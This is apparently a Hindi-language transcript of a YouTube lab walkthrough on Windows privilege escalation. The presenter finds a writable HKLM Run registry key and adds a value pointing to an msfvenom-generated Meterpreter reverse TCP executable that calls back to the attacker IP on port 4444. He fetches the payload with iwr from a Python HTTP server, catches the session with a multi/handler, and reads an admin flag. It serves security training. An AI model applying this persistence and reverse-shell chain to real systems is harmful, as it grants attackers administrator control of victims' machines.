एवरीवन, वेलकम बैक टू माय चैनल सिक्योरिटी कॉन्सेप्ट। तो ये हमारी विंडोज़ सिक्योरिटी सीरीज़ चल रही है, जिसमें अभी तक हमने 29 लैब्स को डिस्कस कर लिया है। तो आज की जो लैब होगी वो 30th होगी और जिसका नाम होगा रजिस्ट्री ऑटो रन। तो इसका जो डिस्क्रिप्शन है वो HFS is running on the startup of the Windows system. Run auto runs utility to locate the HFS registry location for privilege escalation. तो ये privilege escalation पे बेस्ड है आज की वीडियो। नोट इन्होंने एक दे रखा है, यूज स्टूडेंट मशीन फॉर ऑल द प्रिविलेज एक्सक्लेशन एक्टिविटीज, द एडमिनिस्ट्रेटर एक्सेस इज ओनली गिवन फॉर लॉग इन एंड साइन आउट पर्पज। गोल गेन एक्सेस टू मेटाडेटा सेशन विथ हाई प्रिविलेज। ठीक है, तो लास्ट में जो हमारा ऑब्जेक्टिव है वो हमें मेटाडेटा सेशन लेना है विथ हाई प्रिविलेज। हाई प्रिविलेज मीन्स एडमिनिस्ट्रेटर की प्रिविलेज में एक्सक्लेट करेंगे हम, और जो हमें मेटाडेटा सेशन मिलेगा वो ऐसा एडमिन मिलेगा। ठीक है, तो अब यहाँ पर क्या चीज़ है, एक ऑटो रन आपको दिख रहा होगा। तो ये क्या चीज़ होती है ना, ऑटो रन्स क्या अलाउ करता है हमको? ऑटो रन्स हमें अलाउ करता है यूजर्स को व्यू करने के लिए और मैनेज करने के लिए वेरियस प्रोग्राम्स, सर्विसेज, ड्राइवर्स और भी कंपोनेंट जो कि कॉन्फ़िगर्ड किए जाते हैं रन करने के लिए ऑटोमेटिकली ड्यूरिंग विंडोज स्टार्टअप प्रोसेस। जब भी विंडोज सिस्टम स्टार्ट होता है ना, उस टाइम पे जो ऑटोमेटिकली जो ड्राइवर्स हो गए, सर्विसेज हो गई, प्रोग्राम्स हो गए जो रन करते हैं वो होते हैं हमारे ऑटो रन्स। ठीक है, तो ये है रजिस्ट्री ऑटो रन का। तो इसको हम आगे लैब में देखेंगे तो आपको और ज़्यादा क्लियर होगा। और ये लैब फिर मैं कह रहा हूँ प्रिविलेज एक्सक्लेशन की है। तो चलिए फिर स्टार्ट करते हैं। ये इंटरेस्टिंग लैब है, थोड़ी लेंदी होगी पर ये थोड़ी इंटरेस्टिंग लैब है। ठीक है, तो चलिए फिर स्टार्ट करते हैं। सबसे पहले आप देख रहे होगे मेरे पास काली मशीन है, एक अटैकर मशीन है, एक टारगेट मशीन है। ठीक है, तो सबसे पहले मैं अटैकर मशीन में जाता हूँ। तो यहाँ पर आप नोटिस कर रहे होगे जो hfs.exe है ना, वो एक HTTP फाइल सर्वर है जो स्टार्ट हुआ है ऑटोमेटिकली। ठीक है, स्क्रीन पे आपको दिख रहा होगा। अब हमें यही इन्वेस्टिगेट करना है सारे ऑटो रन्स प्रोग्राम्स को। ठीक है, उसके लिए हम यूज़ करेंगे एक सिस इंटरनल्स करके होता है हमारे पास। ठीक है, autorun.exe यूटिलिटी। ठीक है, तो वो अभी मैं आपको करके दिखाता हूँ, फिर आपको क्लियर होगा। ठीक है, तो उसके लिए क्या करेंगे हम, मैं चले जाता हूँ जहाँ पर मेरे को ये प्रोग्राम मिलेगा। पाथ में चले जाते हैं, सी में जाता हूँ। पहले मैं सी में चले गया। सी में जाने के बाद यूजर्स में जाता हूँ। यूजर्स में जाने के बाद स्टूडेंट कहा था उसने हमेशा, जो हमें डिस्क्रिप्शन में मिला था। ठीक है, स्टूडेंट में चले जाते हैं। स्टूडेंट्स के डेस्कटॉप में देखता हूँ। डेस्कटॉप में आपको यहाँ पर एक सिस इंटरनल सूट दिख रहा होगा। ठीक है, तो यहाँ पर हमारा ऑटो रन मिलेगा हमें। ठीक है, अब सेम चीज़ हम एक बार अपने पावर शेल से जाके देखते हैं। यहाँ पर मैं पावर शेल ओपन कर लेते हैं। ठीक है, तो इसको थोड़ा मैं फॉन्ट साइज इंक्रीज कर देता हूँ इसका, अब सब विजिबल होगा अच्छी तरह से। ठीक है, तो सबसे पहले हमें जाते हैं ऑटो रन डॉट ई एक्सी की लोकेशन पे। ठीक है, ऑटो रन डॉट ई एक्सी की लोकेशन में जाएंगे और फिर स्टार्ट करते हैं। तो सबसे पहले सी सी डी सी कॉलन स्लैश यूजर्स में गया था मैं,
स्लैश स्टूडेंट, स्टूडेंट में चले गए, स्लैश, उसके बाद कहाँ पर गया था, स्टूडेंट के डेस्कटॉप में गया था मैं, ये चली गया। डेस्कटॉप में जाके मेरे पास एक फोल्डर था सिस इंटरनल सूट करके, ठीक है। तो इसको ओपन करते हैं, ls करता हूँ, तो यहाँ पर इतना सारा हमारा दिख रहे हैं हमें, देखो यहाँ पे हमें दिखेगा, एक बार देखते हैं, ए में होगा आई थिंक वो, ऑटोरंस डॉट ए सी करके, ये देखो यहाँ पर दिख रहा है ना, ऑटोरंस डॉट ई एक्सी, ठीक है, सॉरी, यहाँ पे पीछे चले जाते हैं और यहीं पर से मैं स्टार्ट करता हूँ इसको, स्लैश ऑटो रन डॉट ई एक्सी, यहाँ पर आएगा ऑटो रन डॉट ई एक्सी। स्टार्ट करते हैं इसको, एग्री में क्लिक करता हूँ, तो ये स्टार्ट हो गया है, ठीक है। तो स्कैन करेगा ये, थोड़ा टाइम लगेगा इसमें, देखते हैं कौन सी होती है। ये स्टार्ट हो गया इसका। तो जो हम सर्च कर रहे थे HFS सर्वर, वो ये है, थोड़ा इंक्रीज कर देते हैं, ये है हमारा HFS सर्वर, ठीक है। तो हम क्या ऑब्जर्व कर रहे हैं, जो hfs.exe है ना एग्जीक्यूटेबल, तो वो उसका जो पाथ है वो ऐड है हमारे रजिस्ट्री में, ठीक है। जो स्टार्ट कर रहा है हमारे hfs.exe को हर एक स्टार्टअप पे, जब भी हमारा सिस्टम स्टार्ट हो रहा है तो hfs.exe जो है फाइल वो रन कर रही है और ऑटोमेटिकली कर रही है, ठीक है। और ये चीज़ है, कोई भी यूज़र उस सिस्टम पे लॉगिन करेगा तो ये स्टार्ट होगी, तो ये सारे यूज़र्स के लिए है, ठीक है। तो अब यहाँ तक तो हमने देख लिया hfs.exe की कहानी। अब हम देखेंगे, अब हम वेरीफाई करेंगे जो स्टूडेंट यूज़र है ना, जिसको हमें यूज़ करना है पूरी लैब में, उस यूज़र के पास राइटिंग परमिशन है या नहीं है उस रजिस्ट्री में, ठीक है। तो उसके लिए क्या करेंगे, हम वापस पावर शेल में जाता हूँ, इसमें यहाँ पर अब हम एक कमांड चलाएंगे जो है get-acl स्पेस हाइफन पाथ स्पेस, अब क्या होगा, अब वो रजिस्ट्री का नाम लिखूंगा मैं HKLM स्लैश सॉफ्टवेयर, सॉरी यहाँ पर कॉलन लगता है, स्लैश सॉफ्टवेयर, सॉफ्टवेयर भी आ गया। सॉफ्टवेयर के बाद क्या आता है, माइक्रोसॉफ्ट, माइक्रोसॉफ्ट आ गया, यहाँ पर से सेलेक्ट कर लेते हैं माइक्रोसॉफ्ट, ये आ गया। माइक्रोसॉफ्ट के अंदर क्या आएगा, विंडोज़, यहाँ पर हमको सर्च में मिल रहा है विंडोज़, चलो पहले विंडोज़ लिख ही लेते हैं, ठीक है, स्लैश विंडोज़, विंडोज़ टाइप कर दिया, उसके बाद करंट वर्जन, अभी मैं आपको इस सिस्टम में जाके दिखाऊंगा कहाँ पर होता है ये, ठीक है, स्लैश रन, यहाँ पर हो गया ये। अब हम क्या करेंगे, पाइप सिंबल लगाएंगे, स्पेस फॉर्मेट चाहिए हमें, सॉरी फॉर्मेट चाहिए हमें लिस्ट में। अब देखते हैं आउटपुट इसका। तो यहाँ पर आप देख रहे होंगे जो यूजर्स है इसमें फुल कंट्रोल है हमारा, ठीक है, फुल कंट्रोल है। तो अब यहाँ पर से हमें क्या पता चल गया है, जो स्टूडेंट यूज़र है ना, वो कैन मॉडिफाई द रजिस्ट्री,
रजिस्ट्री को मॉडिफाई कर सकता है। ठीक है, तो अब क्या करेंगे, अब हम सेट करेंगे एक एडिशनल मैलिशियस एग्जीक्यूटेबल पाथ को उस रजिस्ट्री में। ठीक है, या तो हम ये कर सकते हैं, या हम ओवरराइट कर सकते हैं hfs.exe बाइनरी को। ठीक है, उसके ओरिजिनल पाथ से जहां पर वो प्रेजेंट है। तो उसके लिए क्या होगा, उसके लिए हम पहले हमको क्या वेरीफाई करना होगा कि हमारे पास परमिशन है मॉडिफाई करने की या नहीं उस एग्जीक्यूटेबल को। ठीक है, तो जो लोकेशन है ना हमारे hfs.exe की, उसको हम देखते हैं एक बार जाके उस लोकेशन पे। ठीक है, उससे पहले मैं वेरीफाई कर लेता हूँ पहले परमिशंस को। अब परमिशंस को वेरीफाई करने के लिए हमें फिर से यही कमांड यूज़ करनी पड़ेगी, get-acl स्पेस कॉलन सी डबल इन्वर्टेड कॉमा सी कॉलन स्लैश प्रोग्राम फाइल्स। प्रोग्राम फाइल्स आ गया। प्रोग्राम फाइल्स के अंदर आपका आएगा http, कहीं दिख रहा है http सर्वर, ये आ गया http सर्वर के। अब हमें क्या करना है, फॉर्मेट लिस्ट, फॉर्मेट चाहिए लिस्ट के फॉर्म में, जैसे लास्ट में चाहिए था हमें फॉर्मेट हाइफन लिस्ट। देखते हैं इसका, तो यहाँ पर भी फुल कंट्रोल है, अलाउड है, ये तो एंटी सर्विस है। ठीक है, लेटिन यूजर्स को रीड एंड एग्जीक्यूट। ठीक है, तो हमारे पास क्या है, खाली रीड और एग्जीक्यूट की परमिशन है इस फोल्डर पे। ठीक है, जो हमारा HTTP सर्वर है। तो हम क्या करेंगे, तो राइट करने की है नहीं, तो हम उसमें मॉडिफाई नहीं कर सकते। ठीक है, जो मैंने दो ऑप्शन दिए थे, अब हमें दूसरा ऑप्शन यूज़ करना पड़ेगा, हमें ऐड करना पड़ेगा एक नई रजिस्ट्री को। ठीक है, और वो रजिस्ट्री को हम ऐड करेंगे विथ द अटैकर्स मैलिशियस एग्जीक्यूटेबल के साथ। ठीक है, तो सबसे पहले हम क्रिएट करते हैं रजिस्ट्री को। अब रजिस्ट्री को क्रिएट कैसे करते हैं, उसके लिए हम यहाँ पर टाइप करते हैं रेग एडिट, ये ओपन हो गया। ठीक है, तो आज आपको मैं रजिस्ट्री ऐड करना भी बताऊंगा। तो अब क्या करेंगे, सबसे पहले हम चले जाते हैं अपनी लोकल मशीन के अंदर। ठीक है, लोकल मशीन के अंदर हमारे पास क्या था, सॉफ्टवेयर में जाना था। सॉफ्टवेयर में जाने के बाद हमारा क्या था, माइक्रोसॉफ्ट था। माइक्रोसॉफ्ट में जाने के बाद हमें विंडोज़ में जाना था। आ गया विंडोज़, यहीं पर ही होगा, ये विंडोज़ आ गया। ठीक है, विंडोज़ में जाने के बाद मेरे पास करंट वर्जन था, ये चले गया। इसको थोड़ा मैं एक्सटेंड कर देता हूँ। ठीक है, इसके बाद रन नाम से यहाँ पर होगा आर में, देखते हैं रन, ये है। ठीक है, तो यहाँ पर क्या करेंगे, अब हम ऐड करते हैं एक नई रजिस्ट्री को। उसके लिए यहाँ पर मैं राइट क्लिक करूँगा, न्यू करूँगा, स्ट्रिंग वैल्यू में क्लिक करूँगा, तो ये आ गया हमारा। अब हम इसका नेम क्या रख लेते हैं, अब हमें इसका नेम रखना पहले पड़ेगा, तो एंटर नेम कर देते हैं, हम हैकर कर देते हैं। ठीक है, हैकर कर दिया हमने, तो ये यहाँ तक का हमारे पास हो गया। और अब हम क्या करेंगे, एक क्रिएट करते हैं फोल्डर स्टूडेंट के डेस्कटॉप में। ठीक है, तो उसके लिए मैं वापस चले जाता हूँ यहाँ पे। फोल्डर जब हम क्रिएट करते हैं तो mkdir C /यूज़र्स के अंदर, यूज़र्स के अंदर जाके स्टूडेंट के अंदर जाऊँगा,
स्टूडेंट के अंदर जाके मैं डेस्कटॉप में जाऊंगा। डेस्कटॉप में मुझे क्रिएट करना है एक यूज़र, इसको टूल नाम से यूज कर देते हैं। टूल्स अवेलेबल है पहले से, तो मैं टूल नाम से क्रिएट कर देता हूँ इसे। तो इसको एंटर करूँगा तो ये मुझे एरर दे दे रहा है क्योंकि टूल्स ले लिया था मैंने। ठीक है, तो ये क्रिएट हो गया है। अब एक बार कंफर्म कर देता हूँ, तो ls वापस जाओ उस फोल्डर पे, c:/users/student/desktop, तो एंटर करूँगा। यहाँ पर मुझे एक मेरा जो अभी फोल्डर बनाया था मैंने, ये टूल नाम का, ठीक है, तो फोल्डर भी बना दिया। अब हमने स्टेप बाय स्टेप करते हैं हम काम। ठीक है, अब क्या करते हैं हम, काली मशीन में चले जाता हूँ मैं। अब हमें एक मेन चीज़ करनी है, जनरेट करना है एक मैलिशियस एग्जीक्यूटेबल। तो वो हम जनरेट करेंगे विद द हेल्प ऑफ MSF Venom। ठीक है, तो उसके लिए क्या करना है, अब हमें टर्मिनल ओपन करता हूँ मैं। सबसे पहले मैं IP-ADDR देख लेता हूँ। IP जो है मेरी 10.10.19.3 है, इसको कॉपी कर लेते हैं यहाँ पर। ठीक है, तो अब मैं क्रिएट करता हूँ, तो उसके लिए MSF Venom टैब मारते हैं, -P पेलोड डालता हूँ यहाँ पर, विंडोज़, यहाँ पर टैब वर्क नहीं कर रहा शायद, विंडोज़, ठीक है, /मेटापीटर के बाद -TCP। ठीक है, ये हुआ। एल होस्ट मेरा लोकल होस्ट आ जाएगा, जो मैंने अभी कॉपी किया था, पेस्ट कर देता हूँ इसको मैं, स्पेस एल पोर्ट, जो डिफ़ॉल्ट पोर्ट होता है वो 44444 होता है, -F फॉर्मेट कैसा चाहिए मुझे, exe चाहिए मुझे। ठीक है, और ये आउटपुट चाहिए मुझे program.exe के अंदर। एंटर मारते हैं, यहाँ पर हमारा क्रिएट हो रहा है मैलिशियस पेलोड, फाइनल साइड पेलोड, ये यहाँ पर हमारा क्रिएट हो गया। ठीक है, तो सेकंड फेज भी हमारा कंप्लीट हो गया, पेलोड भी क्रिएट कर दिया। अब यहाँ पर हम स्टार्ट कर देते हैं पाइथन सर्वर, जिससे हम शेयर कर सकें अपने पेलोड को विक्टिम के सिस्टम पे। तो पाइथन -m सिंपल http सर्वर पोर्ट 80 पर रन करा देता हूँ इसे मैं। ये हो गया स्टार्ट हमारा http सर्वर। साथ साथ में मैं एक टैब और ओपन करता हूँ, यहाँ पर मैं MSF console-q लिसनर भी तो हमें ऑन करना पड़ेगा ना, जो लिसन करेगा इनकमिंग कनेक्शंस को। तो उसके लिए हम मल्टी हैंडलर का यूज़ करते हैं, यूज़ एक्सप्लॉइट मल्टी हैंडलर, ये कर दिया। सेट कर देते हैं पेलोड को, सॉरी स्पेलिंग गलत हो गई, पेलोड, सेट पेलोड करते हैं। विंडोज़ क्या था, विंडोज़ मेटापीटर/रिवर्स TCP, ये हो गया पेलोड। ठीक है, सेट कर देते हैं एल होस्ट को। एल होस्ट क्या था मेरा, इसकी IP थी शायद, पेस्ट करूँगा। ठीक है, ये हो गया। सेट कर देता हूँ मैं एल पोर्ट को। ये सारी डिटेल्स वो हैं जो मैंने कहाँ पर दिया था जब मैं मैलिशियस पेलोड को क्रिएट कर रहा था। एल पोर्ट क्या था, 4444, ये हो गया। इसको एक्सप्लॉइट कर देते हैं और यहाँ पर हमारा मल्टी हैंडलर स्टार्ट हो गया। ये हमारा थर्ड फेज कंप्लीट हुआ। ठीक है, अब हमें डाउनलोड करना है मैलिशियस EXE को हमारी काली मशीन से, ठीक है, हमारी विक्टिम मशीन में। तो चलिए फिर
यहाँ पर चलते हैं, वहाँ पर हमारा HTTP सर्वर स्टार्ट है ही। तो यहाँ पर कमांड यूज़ करते हैं IWR, ये भी मैंने बहुत बार यूज़ कर लिया है, -use बेसिक पार्सिंग स्पेस -URI स्पेस HTTP :/ मेरी IP आई थिंक होगी, ठीक है, /program.exe, ठीक है, -out फाइल स्पेस, कहाँ पर सेव करना है मेरे को, ये C के अंदर /users में चले जाते हैं, /student में चले जाता हूँ, /स्टूडेंट्स के अंदर कहाँ था, डेस्कटॉप सेलेक्ट कर लिया हमने। डेस्कटॉप के अंदर क्या था, एक जो फोल्डर बनाया था टूल नाम का, यहाँ चले जाते हैं टूल के अंदर, और जो उसकी मेलिशियस जो हमारी फाइल है उसका नाम है program.exe, ठीक है। तो यहाँ पर एंटर मारते हैं हम, यहाँ पर हमारी आ जानी चाहिए, एक बार जाके देख लेता हूँ मैं कंफर्म करने के लिए। कहाँ पर जाएंगे हम, सी में गए, यूजर्स में गया, स्टूडेंट में गया, उसके डेस्कटॉप में गया, टूल में गया, यहाँ पर आ गया हमारा program.exe फाइल, ठीक है। तो हमारा 4th फेज पूरा हुआ, हमने अपना मेलिशियस पेलोड ट्रांसफ़र कर दिया हमारे विक्टिम के सिस्टम पे। अब क्या करेंगे, अब हम मॉडिफाई करेंगे रजिस्ट्री को जो हमने बनाई थी हैकर नाम की, ठीक है, और उसको प्रोवाइड करेंगे program.exe का एग्जीक्यूटेबल पाथ, ठीक है। तो यहाँ पर मैंने सेलेक्ट किया था कहीं पे, देखते हैं कहाँ पर था वो, ये था आई थिंक, हाँ यहाँ पर था, ठीक है। तो उसके लिए क्या करेंगे, हम सबसे पहले राइट क्लिक करता हूँ, मॉडिफाई करते हैं वैल्यू डाटा। तो वैल्यू डाटा में हमें क्या करना है, पाथ देना है, ठीक है, एग्जीक्यूटेबल पाथ देना है यहाँ पर। तो पाथ क्या है उसका, C में चले जाएंगे, /users के अंदर क्या था, स्टूडेंट था ना, स्टूडेंट के अंदर क्या था, डेस्कटॉप के अंदर हमने एक नया फोल्डर बनाया था टूल, ठीक है, टूल के अंदर था / जो हमारा एग्जीक्यूटेबल नाम क्या है, program.exe, ये है। एक बार मैं फिर से कंफर्म कर लेता हूँ, टूल नाम था इसका शायद, इसको हम डाउन कर देते हैं, यहाँ पे टूल, ठीक है, ये हो गया। इसको मैं ओके कर देता हूँ, तो यहाँ पर आपको पाथ दिख जाएगा, ये आ गया मेरा पाथ, ठीक है। तो ये 5th फेज हमारा कंप्लीट हुआ है, हमने मॉडिफाई कर दिया है रजिस्ट्री को भी, जो हमने न्यू क्रिएट की थी ना, ऐड की थी नई रजिस्ट्री हैकर नाम की, और वहाँ पे हमने पाथ दे दिया जो हमारी मेलिशियस फाइल है, पाथ से ये program.exe, ठीक है। तो यहाँ तक तो हमारा कंप्लीट हुआ है, ठीक है। तो अब क्या करते हैं, हम टारगेट मशीन में जाता हूँ मैं, ठीक है। टारगेट मशीन में जाके क्या करना है, मैंने शट डाउन करता हूँ मैं, यहाँ पे जाते हैं, यहाँ पे मैं शट डाउन स्पेस /L एंटर, जो हो रहा है शट डाउन। अब जब स्टार्ट होगा ना, यहाँ पर मैं रिकनेक्ट में क्लिक करूँगा, और जब स्टार्ट होगा तो मेरे को वहाँ पे मेटापेटा सेशन मिलना चाहिए, क्योंकि मैंने स्टार्टअप जब होगा तो मेरा जो मेलिशियस program.exe फाइल थी ना, वो ऑटोमेटिकली एग्जीक्यूट करेगी, और उसके अंदर क्या है,
मैंने पेलोड डाला है रिवर्स टीसीपी का। ठीक है, तो इसको हम रिकनेक्ट करते हैं और फिर देखते हैं। यहाँ पर ऑटोमेटिकली hfs.exe फाइल भी रन करेगी, वो भी ओपन होगा। ये देखो ओपन हो गया है। ठीक है, ये भी हमारा ऑटो रन में था। अब क्या करेंगे, और इसी के साथ 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 हमारा program.exe फाइल भी रन की होगी। ठीक है, तो अब हम वापस काली मशीन में जाते हैं और यहाँ पर मैं देखता हूँ मेरे को मेटापेटा सेशन मिल गया, जो हमने पेलोड डाला हुआ था program.exe के अंदर, जो हमने MSF Venom के थ्रू पेलोड जनरेट किया था। ठीक है, तो अब क्या है, लास्ट हमारा है फाइंड करना फ्लैग को। उसके लिए हम चले जाएंगे cd//users, यूजर्स आ गया, //administrator //downloads, ये कुछ गलत हो गया। ओके ओके ओके, ये आ गए। यहाँ पर ls करता हूँ मैं, flag.txt मिल जाता है मुझे, cat flag.txt, ये मुझे कंटेंट मिल गया एज अ एडमिन। ये कॉपी कर लेते हैं यहाँ पर से और अपने नोटपैड में सेव कर लेते हैं। तो ये थी आज की लैब हमारी, जो ऑटो रन पे थी। जो भी प्रोसेसेस सर्विसेज हमारी ऑटो रन में होती हैं, जो खुद स्टार्टअप के टाइम पे एग्जीक्यूट होती हैं, तो मुझे पता चला hfs.exe जो एक प्रोसेस है वो ऑटो रन में है। तो मैंने देखा और उसमें चेक किया कि मेरे को मॉडिफाई करने का अलाउड है या नहीं है। तो रजिस्ट्री में मुझे अलाउड था, पर मुझे फ़ोल्डर पे नहीं था, जो HTTP सर्वर का फ़ोल्डर था। तो उसके लिए मैंने एक नई रजिस्ट्री क्रिएट की, हैकर नाम की। फिर मैंने अपना पेलोड क्रिएट किया एक, ठीक है, जो रिवर्स TCP पे था पेलोड। उस पेलोड को फिर मैंने ट्रांसफ़र कराया विक्टिम के उसमें। फिर मैंने उस रजिस्ट्री के अंदर उस पेलोड को डाला, जो program.exe मेलिशियस फाइल थी, उसका पाथ मैंने एंटर करा। ठीक है, और मैंने फिर उसके बाद जब ये सब कुछ हो गया था, मैंने रीस्टार्ट किया अपना सिस्टम। और जो मेरा ऑब्जेक्टिव था कि जब भी सिस्टम रीस्टार्ट होगा तो मेरा जो program.exe है वो ऑटोमेटिकली रन करेगा, और जब वो रन करेगा तो मेरे को एक मेटापेटा सेशन मिल जाएगा मेरी अटैकर मशीन में। ठीक है, तो आई होप ये लैब आपको इन्फॉर्मेटिव लगी हो। इफ़ यू लाइक माई वीडियो, प्लीज़ सब्सक्राइब माई चैनल, हिट द लाइक बटन एंड शेयर योर फीडबैक इन कमेंट सेक्शन। थैंक यू।